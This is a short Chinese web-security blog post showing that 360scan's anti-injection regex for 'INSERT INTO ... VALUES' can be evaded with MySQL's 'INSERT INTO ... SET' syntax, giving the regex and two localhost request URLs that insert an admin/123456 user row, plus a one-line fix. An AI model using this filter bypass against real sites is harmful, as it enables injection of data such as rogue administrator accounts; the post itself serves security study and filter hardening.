纵有疾风起
人生不言弃

Mysql语法绕过360scan insert防注入 – 网站安全 – 自学

360scan正则:INSERT\\s+INTO.+?VALUES

其实Mysql不只可以用insert into xxx values 插入数据,还可以:insert into xxx set xx =

提交:

1 http://localhost/360.php?sql= insert into user ( user ,pass) values ( 'admin' , '123456' )

Mysql语法绕过360scan insert防注入 – 网站安全 – 自学插图

提交set语法:

1 http://localhost/360.php?sql= insert into user set user = 'admin' ,pass= '123456'

Mysql语法绕过360scan insert防注入 – 网站安全 – 自学插图1

修复方法当然最好是加上set了。

    上一篇: SQL注入测试用例 – 网站安全 – 自学php

    下一篇: Webshell下命令执行限制及绕过方法 – 网站安全 –
未经允许不得转载:起风网 » Mysql语法绕过360scan insert防注入 – 网站安全 – 自学
分享到: 生成海报

评论 抢沙发

评论前必须登录!

立即登录